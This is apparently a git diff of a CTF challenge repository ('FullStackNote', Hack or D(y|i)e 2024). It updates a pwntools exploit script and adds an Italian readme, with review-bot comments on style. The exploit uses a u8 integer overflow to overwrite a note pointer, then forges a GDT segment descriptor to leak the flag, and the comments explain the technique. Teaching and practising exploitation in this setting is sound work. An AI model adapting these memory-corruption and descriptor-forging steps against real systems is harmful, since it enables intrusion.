diff --git a/FullStackNote/exploit.py b/FullStackNote/exploit.py
index c274670..69eea47 100755
--- a/FullStackNote/exploit.py
+++ b/FullStackNote/exploit.py
@@ -4,7 +4,12 @@
 # $ pwn template ./sss.elf
 from pwn import *
+# Challange description:
+#
+# BIOS + OS + APP to take a note and.... segmented!
+# Can you get the flag at 0x1400000 ???
 # Set up pwntools for the correct architecture
+#
 exe = context.binary = ELF(args.EXE or './sss.elf')
 context.log_level = 'debug'
@@ -14,7 +19,6 @@ context.log_level = 'debug'
 # ./exploit.py DEBUG NOASLR
-
 def start(argv=[], *a, **kw):
 '''Start the exploit against the target.'''
 if args.GDB:
@@ -61,25 +65,18 @@ kds_base = 0x1000000
 utok_add = 0x100000
 bytes_read = 127
 ucs_off = 0x10
-val = gdt - kds_base - utok_add - bytes_read + ucs_off
 buf_read = 0x4f2c
-flag_pos = 0x500000 * 4
-if (val < 0):
- val = val + 2**32
+flag_pos = 0x1400000
 retaddr = 0x4e90
 ds_base = 0x4ef4 + 0x1100000 - retaddr
 #io = start()
 #io = process('./run.sh')
-#io = remote('localhost', 1337)
-io = remote('37.27.204.218', 1337)
+io = remote('localhost', 1337)
+
 io.recvuntil('>')
 io.sendline('1')
 io.recvuntil('note?')
-# io.send('A'*56)
-# io.send(p32(flag_pos - ds_base))
-# io.send(p32(exe.symbols['userspace_write']))
-# io.sendline(cyclic(98-56-8))
 io.sendline('D'*98)
 io.recvuntil('>')
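Review bot: `Challange` in the new description comment should be `Challenge`, and the `#` added after `# Set up pwntools for the correct architecture` ends up attached to the template's own comment instead of closing the description block above it. Moving that separator up so the block reads `# Can you get the flag at 0x1400000 ???` / `#` / `# Set up pwntools for the correct architecture` (or using a blank line instead) keeps the challenge text visually separate from the setup code. The same description is repeated in the readme added by this commit, so the two copies will need to be kept in sync.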
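Review bot: `io = remote('localhost', 1337)` hard-codes the local docker target, so pointing the script back at a live instance (the address this commit removes) means editing the file again. The script already drives behaviour through pwntools `args` (`args.EXE`, `args.GDB`), so `io = remote(args.HOST or 'localhost', int(args.PORT or 1337))` would keep both targets reachable from the command line without further edits. The template's `start()` helper, defined above this hunk, stays commented out here; if it already honours HOST/PORT it could be used instead, but its body is not visible in this diff.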
@@ -87,43 +84,38 @@ io.sendline('1')
 io.recvuntil('note?')
 io.sendline('B'*98)
+# integer overflow on
+# u8 new_size;
+# ...
+# ...
+#
+# bytes_read = userspace_read(buf, sizeof(buf));
+# new_size = notebook.used + bytes_read;
+# new_size
+#
+# will overwrite my_notebook.ptr
+
 io.recvuntil('>')
 io.sendline('1')
 io.recvuntil('note?')
+# overwrite my_notebook.ptr so that, accessed in kernel (so with ds = 0x10) and
+# offset to translate from kernel to user macro (APP_ADDR_TO_KERNEL_ADDR),
+# points to the gdt kernel data segment. Overwite the gdt so that kernel data
+# segment so that when printing my_notebook.data the address will point to
+# 0x1400000 (flag position, printing the flag)
+val = gdt - kds_base - utok_add - bytes_read + ucs_off
+if (val < 0):
+ val = val + 2**32
 io.send('CCCC')
 io.send(p32(val))
-# io.send('F'*56)
-# io.send(p32(0x10))
-# io.send(p32(flag_pos - ds_base))
-# io.send(p32(exe.symbols['userspace_write']))
-# io.send(b'G'*4)
-# io.send(p32(0x10))
-# io.send(p32(flag_pos - ds_base))
-# io.sendline(cyclic(119-56-12-12))
 io.sendline(cyclic(119))
 io.recvuntil('>')
 io.sendline('3')
 io.recvuntil('remarks')
 kds = create_seg_descriptor(flag_pos - 0x100000 - buf_read, 0xffffffff)
-ds = create_seg_descriptor(ds_base, 0xfffff)
 io.sendline(kds)
-# io.send(p32(val))
-# io.sendline(cyclic(128 - 1 - 4))
-# io.recvuntil('Inserisci la tua nota:')
-# io.sendline(cyclic(128))
-# io.send('2')
-# data = io.recvuntil('Esci')
-# print(data)
-# shellcode = asm(shellcraft.sh())
-# payload = fit({
-# 32: 0xdeadbeef,
-# 'iaaa': [1, 2, 'Hello', 3]
-# }, length=128)
-# io.send(payload)
-# flag = io.recv(...)
-# log.success(flag)
 io.interactive()
diff --git a/FullStackNote/readme.md b/FullStackNote/readme.md
new file mode 100644
index 0000000..d63b447
--- /dev/null
+++ b/FullStackNote/readme.md
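Review bot: The new `val = gdt - kds_base - utok_add - bytes_read + ucs_off` followed by `if (val < 0): val = val + 2**32` re-implements 32-bit unsigned wrap-around by hand; `val &= 0xffffffff` (or `p32(val, sign='signed')`) states the intent directly and also handles a result that overflows upward, which the sign check alone does not. `gdt` is not assigned anywhere in this hunk, so it is presumably defined earlier in the file — worth confirming it is set before this point, since the removed copy of the same line sat further up. The `'CCCC'` + `p32(val)` + `cyclic(119)` payload appears to total 127 bytes before the newline, the same value as `bytes_read = 127` used in the offset above; writing `io.sendline(cyclic(bytes_read - 8))` would make that coupling explicit instead of leaving 119 as a magic number. The explanatory comment block also has typos (`Overwite`, and the dangling `# new_size` line) that make the overflow description hard to follow for the next reader.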
@@ -0,0 +1,20 @@
+# Sfida CTF Hack or D(y|i)e 2024
+
+## Descrizione:
+
+BIOS + OS + APP to take a note and.... segmented!
+Can you get the flag at 0x1400000 ???
+
+Per lanciare la sfida in locale:
+
+docker build -t biosnote .
+docker run -p 1337:1337 --privileged --rm --name biosnote biosnote
+
+writeup/exploit in exploit.py
+
+## Tips
+
+se usiamo gdb con qemu -S -s, gdb non traduce automaticamente gli indirizzi
+logici in indirizzi fisici usando la segmentazione. Per settare breakpoint
+calcolare l'indirizzo fisico dell'istruzione e usare break *indirizzo.
+